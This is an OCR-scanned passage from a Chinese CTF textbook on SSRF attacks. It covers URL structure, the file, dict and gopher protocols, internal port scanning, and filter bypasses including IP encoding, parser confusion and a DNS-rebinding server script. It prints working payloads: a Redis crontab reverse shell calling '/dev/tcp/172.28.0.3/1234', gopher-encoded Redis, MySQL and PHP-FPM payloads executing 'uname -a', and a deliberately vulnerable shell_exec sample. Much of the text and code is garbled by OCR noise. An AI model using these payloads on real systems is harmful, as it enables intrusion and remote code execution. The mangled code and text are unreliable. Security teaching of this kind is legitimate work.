住 CTF 的 Web 类 题目 中 ， 信 息 搜 集 、SQL 注 入 、 任 意 文 件 读 取 漏洞 是 最 弟 凡 、 最 基础 的 漏洞 。 我 们 
比赛 中 遇 到 Web 类 型 的 题目 时 ， 可 以 优先 关 试 上 友 现 题目 中 是 人 否 合 有 上 述 Web 漏 洞 ， 并 完成 题目 的 解 


Er 和 
[ms 


第 2 章 和 第 3 章 将 从 “ 进 阶 ”和 “拓展 ”层次 介绍 Web 类 题目 中 涉及 的 其 他 常见 漏洞 ，“ 进 阶 ” 层 次 涉 
及 的 Web 漏 洞 需要 读者 具备 一 定 的 基础 、 经 验 ， 比 “入 门 ”层次 涉及 的 漏洞 里 复 玉 ,技术 操 更 多 ; 
"拓展 ”层次 则 更 多 地 涉及 Web 类 题目 涉及 的 一 些 特性 问题 ， 如 Python 的 安全 问题 等 。 
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第 2 音 Web 进 阶 


通过 第 1 和 章 的 学 习 ， 相 信 读 者 已 经 对 Web 类 题目 有 了 基本 了 解 。 但 在 实际 比赛 中 ， 题 目 往 往 是 由 多 -1 
漏洞 组 合 而 成 的 ， 而 第 1 章 提 到 的 Web 漏 洞 往往 是 一 些 复杂 题目 的 基础 部 分 ， 如 通过 3QL 注 入 获得 后 
台 密 码 ， 后 谷 仓 企 上 传 漏洞 ， 那 么 ， 如 何 绕 过 上 传 Webshell 拿 到 flag 便 成 为 了 关键 。 

本 章 将 品读 者 介绍 4 种 利用 技巧 较为 楷 多 、 比 赛 出 现 频 率 高 的 Web 漏 洞 ， 分 别 是 : SSRF 漏 洞 、 命 令 
行 漏洞 、XSS 漏 洞 、 文 件 上 传 漏洞 。 希 望 读者 能 在 本 章 的 学 习 过 程 中 思考 ， 如 何在 友 现 “入 | ]” 类 涯 
洞 后 ， 进 一 步 找到 “ 进 阶 ”类 漏洞 。 这 样 的 联系 、 组 合 也 有 助 于 Web 类 型 题目 解 题 思路 的 形成 。 只 有 有 
明日 这 类 漏洞 的 前 因 后 果 ， 才 能 对 这 些 “ 进 阶 ” 类 漏洞 有 更 深入 的 理解 。 
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2.1 SSRF 泌 尊 


SSRF (Server Side Request Forgery， 服 务 端 请 求 伪造 ) 是 一 种 攻击 者 通过 构造 数据 进而 伪造 服务 
器 端 发 起 请 求 的 漏洞 。 因 为 请 求 是 由 内 部 发 起 的 ， 所 以 一 般 情况 下 ，SSRF 漏 洞 攻 击 的 目标 往往 是 从 外 
网 无 法 访问 的 内 部 系统 。 


SSRF 漏 洞 形成 的 原因 多 是 服务 端 提供 了 从 外 部 服务 获取 数据 的 功能 ， 但 没有 对 目标 地 址 、 协 议 等 重要 
参数 进行 过 滤 和 限制 ， 从 而 导致 攻击 者 可 以 自由 构造 参数 ， 而 发 起 预期 外 的 请 求 。 


2.1.1 SSRF 的 原理 解析 
URL 的 结构 如 下 : 


URI = scheme:[//authority]path[?query][#fragment] 


authority 组 件 又 分 为 以 下 3 部 分 ( 见 图 2-1-1) : 


userinfo@]host[:port] 


图 2-1-1 (图 片 来 源 : 维基 百科 ) 
scheme 由 一 串 大 小 写 不 敏感 的 字符 组 成 ， 表 示 获 取 资 源 所 需要 的 协议 。 


authority 中 ，userinfo 遇 到 得 比较 少 ， 这 是 一 个 可 选项 ， 一 般 HTTP 使 用 匿名 形式 来 获取 数据 ， 如 果 
需要 进行 身份 验证 ， 格 式 为 username: password， 以 @ 结 尾 。 


host 表 示 在 哪个 服务 器 上 获取 资源 ， 一 般 所 见 的 是 以 域名 形式 呈现 的 ， 如 baidu.com， 也 有 以 IPv4、 
IPv6 地 址 形式 呈现 的 。 


port 为 服务 器 端口 。 各 协议 都 有 默认 端口 ， 如 HTTP 的 为 80、FTP 的 为 21。 使 用 默认 端口 时 ， 可 以 将 
端口 省 略 。 


path 为 指向 资源 的 路 径 ， 一 般 使 用 “/” 进 行 分 层 。 


query 为 查询 字符 串 ， 用 户 将 用 户 输 入 数据 传递 给 服务 端 ， 以 “? ”作为 表示 。 例 如 ， 向 服务 端 传递 
用 户 名 密码 为 “? username=admin&password=admin123”。 


fragment 为 片段 ID， 与 query 不 同 的 是 ， 其 内 容 不 会 被 传递 到 服务 端 ， 一 般 用 于 表示 页 面 的 锚 点 。 
理解 URL 构 造 对 如 何 进行 绕 过 和 如 何 利用 会 很 有 帮助 。 


以 PHP 为 例 ， 假 设 有 如 下 请 求 远程 图 片 并 输出 的 服务 。 


php 

$url = 4_GET['urtL'] ; 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_HEADER, false); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
$res = curl_exec($ch); 
header('content-type: image/png'); 
curl_close($ch); 
echo $res; 

?> 


如 果 URL 参 数 为 一 个 图 片 的 地 址 ， 将 直接 打印 该 图 片 ， 见 图 2-1-2。 


会 € © |127.0.0.1:8233/?url=https://www.baidu.com/img/bd._logo1.png 
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.00 
Bai 人 百度 
图 2-1-2 
但 是 因为 获取 图 片 地 址 的 URL 参 数 未 做 任何 过 滤 ， 所 以 攻击 者 可 以 通过 修改 该 地 址 或 协议 来 发 起 SSRF 
攻击 。 例 如 ， 将 请 求 的 URL 修 改 为 file:///etc/passwd， 将 使 用 FILE 协 议 读 取 /etc/passwd 的 文件 内 
容 (最 常见 的 一 种 攻击 方式 ) ， 见 图 2-1-3。 


2.1.2 SSRF 漏 ; 洱 的 寻找 和 测试 


SSRF 漏 洞 一 般 出 现在 有 调用 外 部 资源 的 场景 中 ， 如 社交 服务 分 享 功能 、 图 片 识 别 服务 、 网 站 采集 服 
务 、 远 程 资 源 请 求 (如 wordpress xmlrpc.php) 、 文 件 处 理 服务 (如 XML 解析 ) 等 。 在 对 存在 SSRF 
漏洞 的 应 用 进行 测试 的 时 候 ， 可 以 尝试 是 否 能 控制 、 支 持 常见 的 协议 ， 包 括 但 不 限于 以 下 协议 。 


他 file://: 从 文件 系统 中 获取 文件 内 容 ， 如 file:///etc/passwd。 


令 dict://: 字典 服务 器 协议 ， 让 客户 端 能 够 访问 更 多 字典 源 。 在 3SRF 中 可 以 获取 目标 服务 器 
上 运行 的 服务 版 本 等 信息 ， 见 图 2-1-4。 


view-source:http://example.com:8233/?url=dict://172.26.0.2:6379/info 


3 # Server 

4 redis version:5.0.5 

5 redis git shal:00000000 

6 redis git dirty:0 

7 redis build id:916ba80cd2a8ac95 

3 redis mode:standalone 

9 os:Linux 4.19.76-linuxkit x86 64 
10 arch bits:64 

11 multiplexing api:epoll 

12 atomicvar api:sync-builtin 

13 gcc version:4.4.7 

14 process id:26 

15 run id:6ba6724d22a30801lca9d528506ab67afc9a63cdl 
16 tcp port:6379 

17 uptime in seconds:32 

13 uptime in days:0 

19 hz:10 

20 configured hz:10 

21 Tru clock:971106 

22 executable:/opt/redis/bin/redis-server 
23 config file:/opt/redis/redis.conf 
24 

25 # Clients 

26 connected clients:1 

27 client recent max input buffer:0 
28 client recent max output buffer:0 
29 blocked clients:0 

30 


图 2-1-4 


们 gopher://: 分 布 式 的 文档 传递 服务 ， 在 SSRF 漏 洞 攻击 中 发 挥 的 作用 非常 大 。 使 用 Gopher 
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协议 时 ， 通 过 控制 访问 的 URL 可 实现 向 指定 的 服务 器 发 送 任 意 内 容 ， 如 HTTP 请 求 、MySQL 请 
求 等 ， 所 以 其 攻击 面 非 营 广 ， 后 面 会 着 重 介 绍 Gopher 的 利用 方法 。 


2.1.3 SSRF 漏 洞 攻击 方式 


2.1.3.1 内 部 服务 资产 探测 


SSRF 漏 洞 可 以 直接 探测 网 站 所 在 服务 器 端口 的 开放 情况 甚至 内 网 资产 情况 ， 如 确定 该 处 存在 SSRF 漏 
洞 ， 则 可 以 通过 确定 请 求 成 功 与 失败 的 返回 信息 进行 判断 服务 开放 情况 。 例 如 ， 使 用 Python 语言 写 一 
个 向 单 的 利用 程序 。 


ports = ['80'，'3366'，'6379'，'86080'，'80699'] 
session = req.Sessio nO) 
for i in xrange(255): 
ip = '192.168.80. pe 第 工 
for port in 
url = ee os example.com/?url=http://%s:%s' % (ip, port) 
try: 
res = sess get(url, timeout=3) 
if le ty nt) > 9: 
BS rint port, 'is open 
een 
print 'DONE' 


scan.py 
192.168.80.2 63/19 1s open 
192.168.80.3 3306 1s open 
192.168.80.4 80 1s open 
192.168.80.5 80 1s open 


DUUNE 


2.1.3.2 使 用 Gopher 协 议 扩展 攻击 面 


1. 攻击 Redis 


Redis 一 般 运行 在 内 网 ， 使 用 者 大 多 将 其 绑 定 于 127.0.0.1:6379， 有 目 一 般 是 空 口令 。 攻 击 者 通过 SSRF 
漏洞 未 授权 访问 内 网 Redis， 可 能 导致 任意 增 、 查 、 删 、 改 其 中 的 内 容 ， 其 至 利用 导出 功能 入 
、Webshell 和 SSH 公 钥 (使 用 导出 功能 写 入 的 文件 所 有 者 为 redis 的 启动 用 户 ， 一 般 启 动用 户 为 
， 如 果 启 动用 户 权限 较 低 ， 将 无 法 完成 攻击 ) 。 由 


Redis 是 一 条 指令 执行 一 个 行为 ， 如 果 其 中 一 条 指令 是 错误 的 ， 那 么 会 继续 读 取 下 一 条 ， 所 以 如 果 发 
送 的 报 文 中 可 以 控制 其 中 一 行 ， 就 可 以 将 其 修改 为 Redis 指 令 ， 分 批 执行 指令 ， 完 成 攻击 。 如 果 可 以 
控制 多 行 报 文 ， 那 么 可 以 在 一 次 连接 中 完成 攻击 。 


在 攻击 Redis 的 时 候 ， 一 般 是 写 入 Crontab 反 弹 shell， 通 党 的 攻击 流程 如 下 : 


redis-cli flushall 
echo -~e "\n\n*/1 * * bash -i /dev/tcp/172.28.0.3/1234 0>&1\n\n" | redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 


redis-cli config set dbfilename root 
redis-cli save 


此 时 我 们 使 用 socat 获 取 数 据 包 ， 命 令 如 下 : 
scoat -V tcp-Listen:1234,fork tcp-connect:LocaLhost:6379 


将 本 地 1234 端 口 转发 到 6379 端 口 ， 骨 依次 执行 攻击 流程 的 指令 ， 将 得 到 攻击 数据 ， 见 图 2-1-6。 
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图 2-1-6 
然后 将 其 中 的 数据 转换 成 Gopher 协 议 的 URL。 先 舍弃 开头 为 “>” 和 “<” 的 数据 ， 这 表示 请 求 和 返 
回 ， 表 舍弃 掉 +OK 的 数据 ， 表 示 返 回 的 信息 。 在 剩 下 的 数据 中 ,将 “\r” 蔡 换 为 “%0d”,， 将 
\n” (换行 ) 昔 换 为 “%0a”， 其 中 的 “$ ”进行 URL 编 码 ， 可 以 得 到 如 下 字符 串 : 


Er i En 
i%20>8&%20/dev/tcp/172.28.0.3/1234%200>&1 
a%243%0d%0as 


6%0d%0a/var/spool/cr 
9%0d%g9adbfiLename%g6d%09a%244%0d%06a 


如 果 需 要 直接 在 该 字符 串 中 修改 反弹 的 IP 和 端口 ， 则 需要 同时 修改 前 面 的 “$56”，“56” Ce 本 
ronta 
中 命令 的 长 度 。 例 如 ， 此 时 字符 串 为 
要 修改 反弹 的 IP 为 172.28.0.33， 则 需要 将 “56” 改 为 “57” (56+1) 。 将 构造 好 的 字符 串 填 入 进行 
一 次 攻击 ， 见 图 2-1-7， 返 回 了 5 个 OK， 对 应 5 条 指令 ， 此 时 在 目标 机 器 上 已 经 写 入 了 一 个 Crontab, 
DU pa et 


图 2-1-7 
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图 2-1-8 
写 Webshell 等 与 写 文件 操作 同 理 ， 修 改 目 录 、 文 件 名 并 写 入 内 容 即 可 。 


2. 攻击 MySQL 


攻击 内 网 中 的 MySQL， 我 们 需要 先 了 解 其 通信 协议 。MySQL 分 为 客 尸 端 和 服务 端 ， 由 客 尸 端 连 接 服 
务 疾 有 4 种 方式 : UNIX 套 接 字 、 内 人 共享 、 命 名 管道 、TCP/IP 套 接 字 。 


我 们 进行 攻击 依靠 第 4 种 方式 ，MySQL 客 户 端 连接 时 会 出 现 两 种 情况 ， 即 是 否 需 要 密码 认证 。 当 需要 
进行 密码 认证 时 ， 服 务 器 先 发 送 salt， 然 后 客户 端 使 用 salt 加 密 密 码 再 验证。 当 不 需 进行 密码 认证 时 ， 
将 直接 使 用 第 4 种 方式 发 送 数 据 包 。 所 以 ， 在 非 交 互 模式 下 登录 操作 MySQL 数 据 库 只 能 在 空 密码 未 授 
权 的 情况 下 进行 


假设 想 查 询 目标 服务 器 上 数据 库 中 user 表 的 信息 ， 我 们 先 在 本 地 新 建 一 张 user 表 ， 再 使 用 tcpdump 进 
行 抓 包 ， 并 将 抓 到 的 流量 写 入 /pcap/mysql.pcap 文 件 。 命 令 如 下 : 


tcpdump -i Lo port 3306 -wu /pcap/mysql.pcap 


开始 抓 包 后 ， 登 录 MySQL 服 务 器 进行 查询 操作 ， 见 图 2-1-9。 


图 2-=1-9 


a id tl 过 滤 MySQL， 再 随便 选择 一 个 包 并 单 击 右键 ， 
在 弹出 的 快捷 菜单 中 选择 “追踪 流 一 TCP 沈 ”， 过 滤 出 客户 妆 到 服务 问 的 数据 包 ， 最 后 将 格式 调整 
为 HEX 转 储 ， 见 图 2-1-10。 


此 时 便 获 得 了 从 客户 疡 到 服务 亲 并 执行 命令 完整 流程 的 数据 包 ， 然 后 将 其 进行 URL 编 码 ， 得 到 如 下 数 
据 : 


73%68%6f%77%20%64%61%74%61%62%61 
8%6f%77%20%74%61%62%6c%65%73%06%09%09%69%04%75%73%65%72%90%13%09 


进行 攻击 ， 获 得 user 表 中 的 数据 ， 见 图 2-1-11。 
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SN2SASSSS 
TT 

< NSSUSSF2SS2 
22229u0222 
2yy238X2S3 

S85 SSXRURRRS2 

2 8z SYSYSSS23 


» 


38 3842888838333 


P42 


00 
00 
6d 
73 
78 
69 
33 
6e 
72 
6d 
63 
6d 
43 


¥ Ba RSSRRYz3SS 
S PY 88833S3S 


全 
和 


64 61 74 61 62 61 
74 61 62 6c 65 73 
74 20 2a 20 66 72 
om 


SN3 38 $$ 2&8 


BAURRVIBONENNERERRTT 
F892 AN 全 


323338333>3323z3x3xxxxx333 

33333233303x33d8xxasx33333 

3Szx333 33333323335383335 

2y828 838882388N882P388S38 
dj 


BUHY gg 
NOUS BY $$ BH 


力 闸 10. 12 而 P 妆 纪要 0 慑 务 中 分 杷 0 turns) 操 才 迁 反 . 
127.0.0.1:46306 > 127.0.0.13306 (306 bytes) 回 显示 和 保存 数据 为 “Hex 转 储 


图 2-1-10 


图 2-1-11 
3. PHP-FPM 攻 击 


利用 条 件 如 下 : Libcurl， 版 本 高 于 7.45.0: PHP-FPM ， 监 听 端 口 ， 版 本 高 于 5.3.3; 知道 服务 器 上 任 
意 一 个 PHP 文 件 的 绝对 路 径 。 


首先 ，FastCGIl 本 质 上 是 一 个 协议 ， 在 CGI 的 基础 上 进行 了 优化 。PHP-FPM 是 实现 和 管理 FastCGI 的 
进程 。 在 PHP-FPM 下 如 果 通 过 FastCGI 模 式 ， 通 信 还 可 分 为 两 种 : TCP 和 UNIX 套 接 字 (socket) 。 


TCP 模 式 是 在 本 机 上 监听 一 个 问 口 ， 默 认 痛 口号 为 9000，Nginx 会 把 客户 疹 数 据 通过 FastCGI 协 议 传 
给 9000 闯 口 ，PHP-FPM 拿 到 数据 后 会 调用 CGI 进程 解析 。 


[elGEEDYL EN 


location ~ \.php$ { 
index index.php index.html index.htm; 
include /etc/nginx/fastcgi_params; 
fastcgi_pass 127.0.0.1:9000; 
fastcgi_index index.php; 
include fastcgi_params; 


BEE EPMEmE 


listen=127.0.0.1:9000 


既然 通过 FastCGI 与 PHP-FPM 通 信 ， 那 么 我 们 可 以 伪造 FastCGI 协 议 包 实 现 PHP 任 意 代 码 执行 。 
协议 中 只 可 以 传输 配置 信息 、 需 要 被 执行 的 文件 名 及 客户 端 传 进来 的 GET、POST、 eal 
据 ， 然 后 通过 更 改 配 置信 息 来 执行 任意 代码 。 
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在 php.ini 中 有 两 个 非常 有 用 的 配置 项 。 


必 auto prepend file: 在 执行 目标 文件 前 ， 先 包含 auto prepend file 中 指定 的 文件 ， 并 且 
可 以 使 用 伪 协 议 如 php://input。 


学 auto append file: 在 执行 目标 文件 后 ， 包 含 auto append file 指 向 的 文件 。 


php://input 是 客户 端 HTTP 请 求 中 POST 的 原始 数据 ， 如 果 将 auto_prepend file 设 定 为 php: Ua 

， 那 么 每 个 文件 执行 前 会 包含 POST 的 数据 ， 但 php://input 需 要 开启 allow_url include， 官方 3 册 

里 然 规 定 这 个 配置 规定 只 能 在 php.ini 中 修改 ， 但 是 FastCGI 协 议 中 的 PHP ADMIN_VALUE 选 项 可 修 

改 几 乎 所 有 配置 (disable functions 不 可 修改 ) ， 通 过 设置 PHP ADMIN VALUE 把 allow url ee 
修改 为 True， 这 样 就 可 以 通过 FastCGI 协 议 实现 任意 代码 执行 。 


使 用 网 上 已 公开 的 Exploit， 地 址 如 下 : 


py & pa, 2 2 2 SL 化 pa Ck pa 2 RE 
nt https: //9is ist. .github. com/phi 让 hen n/9615e s2429f31948f7e 30f3937356cf75 


这 里 需要 前 面 提 到 的 限制 条 件 : 需要 知道 服务 器 上 一 个 PHP 文 件 的 绝对 路 径 因为 在 include 时 会 判 
断 文 件 是 否 存 在 ， 并 且 security.limit extensions 配 置 项 的 后 缀 名 必 外 i 一 般 可 以 使 用 默认 
的 /vavwww/htmlyindex.php ， 如 果 无 法 知道 Web 目 录 ， 可 以 党 试 查 看 PHP 默 认 安 装 中 的 文件 列 
表 ， 见 图 2-1-12。 





使 用 Exploit 进 行 攻 击 ， 结 果 见 图 2-1-13。 


使 用 nc 监听 某 个 端口 ， 获 取 攻 击 流量 ， 见 图 2-1-14。 将 其 中 的 数据 进行 URL 编 码 得 到 |: 




















图 2-1-12 








ak 
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图 2-1-14 


%01%01%03%EF%00%08%00%00%00%01%0 1%04%03%EF%01%E7%09%00%09E%02CONTENT_LENGTH41% 
EC%1OCONTENT_TYPEapplication/text%0B%QUREMOTE_PORT9985%0B%Q9SERVER_NAMELocalhost%11%0BGATEWAY_ 

INTERFACEFastCGI/1 .0Q%OF%OESERVER_SOFTWAREphp/fcgiclient%OB%09REMOTE_ADDR127.0.0.1%0F%1BSCRIPT_ 

FILENAME/usr/local/Lib/php/PEAR.php%QB%1BSCRIPT_NAME/usr/Local/Lib/php/PEAR.php%09%1FPHP_VALUEa 
uto_prepend_fiLe%29%3D%29php%3A//input%9E%64REQUEST_NMETHODP0OST%0B%92SERVER_PORT89%9F%68SERVER_ 

PROTOCOLHTTP/1.1%9C%99QUERY_STRING%6F%16PHP_ADNMIN_VALUEaLLow_urL_incLude%29%3D%290n%9D%91DOCUME 
NT_ROOT/%0OB%09SERVER_ADDR127.0.0.1%0B%1BREQUEST_URI/usr/Local/Lib/php/PEAR. php%91%94%03%EF%00%9 
©%00%00%01%05%03%EF%00%29%00%00%3C%3Fphp%20var_dump%28shell_exec%28%27uname%20-a%27%29%29%3B%3F 
%3E%01%05%03%EF%00%00%00%00 


其 攻击 结果 见 图 2-1-15。 


Sp 
4. 攻击 内 网 中 的 脆弱 Web 应 用 


内 网 中 的 Web 应 用 因为 无 法 被 外 网 的 攻击 者 访问 到 ， 所 以 往往 会 忽视 其 安全 威胁 。 


假设 内 网 中 存在 一 个 任意 命令 执行 漏洞 的 Web 应 用 ， 代 码 如 下 : 


<?php 
var_dump(shell_exec($_POST['command'])); 


> 


在 本 地 监听 任意 端口 ， 然 后 对 此 端口 友 起 一 次 POST 请 求 ， 以 抓 取 请 求 数据 包 ， 见 图 2-1-16。 


去 挥 监听 的 端口 号 ， 得 到 如 下 数据 包 : 


POST HIDE 

Host: 127.0.0.1 
User-Agent: curl/7.52.1 
Accept: x*/* 
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LU 


RE OE SE A | 


cation/x-www-form-urlencoded 
commandls la/ 


将 其 改 成 Gopher 协 议 的 URL,， 总 规则 同上 . 内行 uname- a 


‘pOST%28/%20HTTP/1. 1%0d%0aHost:%20127.0.0.1%0d%0aUser— 二 a ae ed 
Agent:%20curl/7.52.1%0d%0aAccept:%20*/*%0d%0aContent-Length:%2016%0d%0aContent-— 
Type:%29application/x-wan-form-urlencoded%Od%0a%od%oacommand=Uname%20 


攻击 结果 见 图 2-1-17。 


图 2-1-=17 


2.1.3.3 自动 组 六 Gopher 


目前 已 经 有 人 总 结 出 多 种 协议 并 写 出 自动 转化 的 脚本 ， 所 以 大 部 分 情况 下 不 需要 再 手动 进行 抓 包 与 转 
换 。 推 荐 工具 https://github.com/tarunkant/Gopherus， 使 用 效果 见 图 2-1-18。 


2.1.4 SSRF 的 绕 过 


SSRF 也 存在 一 些 WAF 绕 过 场景 ， 本 节 将 简单 进行 分 析 。 


2.1.4.1 IP 的 限制 


使 用 Enclosed alphanumerics 代 蔡 IP 中 的 数字 或 网 址 中 的 字母 ( 见 图 2-1-19) ， 或 者 使 用 句号 代 蔡 
点 〈( 见 图 2-1-20) 。 


图 2-1-18 


图 2-1=19 
FAN vee eo eee | 
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<?php 
show_ source( _ FILE 
$url = $ GETI[' [url']; 
$ch = curl init(); 
curl setopt($ch, CURLOPT URL, S$url); 
curl setopt($ch, CURLOPT HEADER, false); 
curl setopt($ch, CURLOPT FOLLOWLOCATION, true); 
$res = curl exec($ch); 
curl close($ch) ; 
echo S$res; 


图 2-1-20 
如 果 服 务 端 过 滤 方 式 使 用 正则 表达 式 过 滤 属于 内 网 的 IP 地 址 ， 那 么 可 以 坚 试 将 IP 地 址 转换 为 进 制 的 方 
式 进行 绕 过 ， 如 将 127.0.0.1 转 换 为 十 六 进 制 后 进行 请 求 ， 见 图 2-1-21。 


可 以 将 IP 地 址 转换 为 十 进 制 、 八 进 制 、 十 六 进 制 ， 分 别 为 2130706433、17700000001、 re 
。 在 转换 后 进行 请 求 时 ， 十 六 进 制 前 需 加 0x， 八 进 制 前 需 加 0， 转 换 为 八进制 后 开头 所 加 的 0 可 以 为 
多 个 ， 见 图 2-1-22。 


图 2-1-21 


cron|# pine 017700000001 
ID 


1 ( mp_ Se 


-heat ee 
reCcelved ， (0 和 DaCket 


OITA TAO 


00001 plne statis 
1 recelved ， 
90.089/0.089 
图 2-1-22 
另外 ，IP 地 址 有 一 些 特殊 的 写法 ， 如 在 Windows 下 ，0 代 表 0.0.0.0， 而 在 Linux 下 ，0 代 表 127.0.0. 
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1， 见 图 2-1-23。 所 以 ， 某 些 情 况 下 可 以 用 http://0 进 行 请 求 127.0.0.1。 类 似 127.0.0.1 这 种 中 间 部 分 
含有 0 的 地 址 ， 可 以 将 0 省 略 ， 见 图 2-1-24。 


2.1.4.2 302 跳 转 


网 络 上 存在 一 个 名 叫 xip.io 的 服务 ， 当 访问 这 个 服务 的 任意 子 域 名 时 ， 都 会 重 定向 到 这 个 子 域名 ， es 
.0.0.1.xip.io， 风 图 2-1-25。 






































图 2-1-23 




















图 2-1-24 





图 2-1-25 
这 种 方式 可 能 存在 一 个 问题 ， 即 在 传 入 的 URL 中 存在 关键 字 127.0.0.1， 一 般 会 被 过 滤 ， 那 么 ， 我 们 可 
以 使 用 短 网 址 将 其 重 定向 到 指定 的 IP 地 址 ， 如 短 网 址 http://dwz.cm/11SMa， 见 图 2-1-26。 
有 时 服务 端 可 能 过 滤 了 很 多 协议 ， 如 传 入 的 URL 中 只 人 允许 出 现 “http” 或 “https”， 那 么 可 以 在 自己 
的 服务 器 上 写 一 个 302 跳 转 ， 利 用 Gopher 协 议 攻击 内 网 的 Redis， 见 图 2-1-27。 


2.1.4.3 URL 的 解析 问题 


CTF 线 上 比赛 中 出 现 过 一 些 利 用 组 件 解析 规则 不 同 而 导致 绕 过 的 题目 ， 代 码 如 下 : 
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图 2-1-26 


图 2-1-27 


<?php 
highlight_file(__FILE__); 
function check_inner_ip($url) 
{ 
$match_result = preg_match('/*(http|lhttps)?:\/\/.*(\/)?.*$/ 
if (!$match_result) 
{ 


die('url fomat error'); 


try 


{ 

$url_parse=parse_url($url); 
} 
catch(Exception $e) 


die('url fomat error'); 
return false; 
} 
$hostname = $url_parse['host']; 
$ip = gethostbyname($hostname); 
$int_ip = ip2Long($ip); 
return ip2Long('127.0.6.9')>>24 == $int_ip>>24 || ip2Long('16.9.0.9')>>24 == 
$int_ip>>24 || ip2Long('172.16.9.9')>>26 == $int_ip>>28 || 
ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 
function safe_request_url($url) 
{ 
if (check_inner_ip($url)) 
二 


echo $url.' is inner ip'; 

} 

else 

{ 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0); 
$output = curl_exec($ch); 
$result_info = curl_getinfo($ch); 
if($result_info[ 'redirect_url']) 
{ 

safe_request_url($result_info['redirect_url']); 


curl_close($ch); 
var_dump($output); 
} 
} 
$url = $_GET['url']; 
if(!empty($url)){ 
safe_request_url($url); 
} 
?> 


如 果 传 入 的 URL 为 http://a@127.0.0.1:80@baidu.com， 那 么 进入 safe request url 后 ，parse_url 取 
到 的 host 其 实 是 baidu.com， 而 curl 取 到 的 是 127.0.0.1:80， 所 以 实现 了 检测 IP 时 是 正常 的 一 个 网 站 域 
名 而 实际 curl 请 求 时 却 是 构造 的 127.0.0.1， 以 此 实现 了 SSRF 攻 击 ， 获 取 flag 时 的 操作 见 图 2-1-28。 


除了 PHP， 不 同 语言 对 URL 的 解析 方式 各 不 相同 ， 进 一 步 了 解 可 以 参考 : https://www.blackhat. 


com 
[AS AE on hin By 

rending 
-Programming-Languages.pdf。 


S909 apienample_du comvieg php 其 中 


会 [| emplecom?uri=http://a:@127.0.0.1:80@8baidu coryflag php cC 和 声 吕 人 台 宣 三 


NT 日 - SQL X55S" Encryption™ Encoding” Other 
三 Load URL mtp /Jexamote com/Turie Mtp /la.@127.0.0 180@baidu coryfag prhp = 
员 ”spmuRL * 
Eeecute 
Enmable Post data 。 Enable Referrer 
YetUrn IpZIOng( 127.U.U.U 3722 we Sint TD2223 [|| ipZIOng( 10.U.U.U JS324 we Sint TB2224 || IBZIOng( 172.16.U.U JS320 we 
} 
function safe request urll($url) 
{ 
if (check inner ip(Surl)) 
echo Surl. is inner ip'; 
else 
$ch = curl init(); 


curl setopt($ch, CURLOPT URL, $url); 
curl setopt($ch, CURLOPT RETURNTRANSFER, 1); 
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SU SBCOPEI3CRI wUIUMOET HENVUEN, Vv)} 
$output = curl exec($ch); 

$result info = “curl _getinfo($ch); 

if ($result infol "redirect url']) 


safe request url($result infol 'redirect vrl']); 
curl closel($ch); 
var_ dump($output); 
} 
} 
$url = $ GET[ vrl' ); 


ist langeprt url) ){ 
We Wrl(Surl); 


?> string(38) "flagfug9thaevi2JoobaiLiLah4zae6fie4r》 


图 2-1-28 


2.1.4.4 DNS Rebinding 


在 某 些 情况 下 ， 针 对 SSRF 的 过 滤 可 能 出 现下 述 情 况 : 通过 传 入 的 URL 提 取出 host， 随 即 进行 DNS 解 

析 ， 获 取 IP 地 址 ， 对 此 IP 地 址 进行 检验 ,判断 是 否 合法 ， 如 果 检 测 通 过 ， 则 再 使 用 curl 进 行 请 求 。 那 
这 里 再 使 用 curl 请 求 的 时 候 会 做 第 二 次 请 求 ， 即 对 DNS 服 务 器 重新 请 求 ， 如 果 在 第 一 次 请 求 时 其 

DNS 解 析 返 回 正常 地 址 ， 第 二 次 请 求 时 的 DNS 解 析 却 返回 了 恶意 地 址 ， 那 么 就 完成 了 DNS 

攻击 


JollalellaTe 


BINNIE NE 
2-1-29。 这 时 解析 是 随机 的 ， 但 不 一 定 会 交 蔡 返回 。 所 以 ， 这 种 方式 需要 一 定 的 概率 才能 成 功 。 


Value 


points to 1270.01 
points to 123.125.114.144 
图 2-1-29 
第 二 种 方式 则 比较 稳定 ， 自 己 搭建 一 个 DNS Server， 在 上 面 运行 自 编 的 解析 服务 ， 使 其 每 次 返回 的 
都 不 同 。 


先 给 域名 添加 两 条 解析 ， 一 条 A 记录 指 同 服务 器 地 址 ,一 条 NS 记录 指向 上 条 记录 地 址 。 


DINNSNJAMIvav 


from twisted.internet import reactor, defer 
from twisted.names import client, dns, error, server 
record={} 


class DynamicResolver(object): 
def _doDynamicResponse(self, query): 
name = query.name.name 
if name not in record or record[name]<1: 
ip="8.8.8.8" 
else: 
ip="127.0.0.1" 
if name not in record: 
record[name]=0 
record[name]+=1 
print name+" ===> "+ip 
answer = dns.RRHeader( 
name=name， 
type=dns .A, 
cls=dns.IN, 
tt1=0, 
payload=dns.Record_A(address=b'%s'%ip, ttl=0) 
) 
answers = [answer] 
authority = [] 
additional = [] 
return answers, authority, additional 
def query(self, query, timeout=None): 
return defer.succeed(self._doDynamicResponse(query)) 
def main(): 
factory = server.DNSServerFactory(clients = [DynamicResolver(), \ 
client.Resolver(resolv='/etc/resolv.conf')]) 
protocol = dns.DNSDatagramPprotocol(controller=factory) 
reactor.listenUDP(53, protocol) 
reactor.run() 
if __name__ == '__main__': 
raise SystemExit(main()) 


请 求 结果 见 图 2-1-30。 





RRO 10， {oy A 
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图 2-1-30 


图 2-1-30 ( 续 ) 


2.1.5 CTF 中 的 SSRF 
1. 胖 哈 勃 杯 第 十 三 届 CUIT 校 赛 Web300 短 域名 工具 


本 题 考 察 的 知识 点 主要 是 重 绑 定 绕 过 WAF 和 DICT 协 议 的 利用 。PHP 的 WAF 在 进行 判断 时 ， 第 一 次 会 
解析 域名 的 IP， 然 后 判断 是 否 为 内 网 IP， 如 果 不 是 ， 则 用 CURL 去 真正 请 求 该 域名 。 这 里 涉及 CURL 请 
求 域 名 的 时 候 会 第 二 次 进行 解析 ， 重 新 对 DNS 服务 器 进行 请 求 获 取 一 个 内 网 |P， 这 样 残 绕 过 了 限制 。 
实际 效果 见 1.3.4.4 节 。 


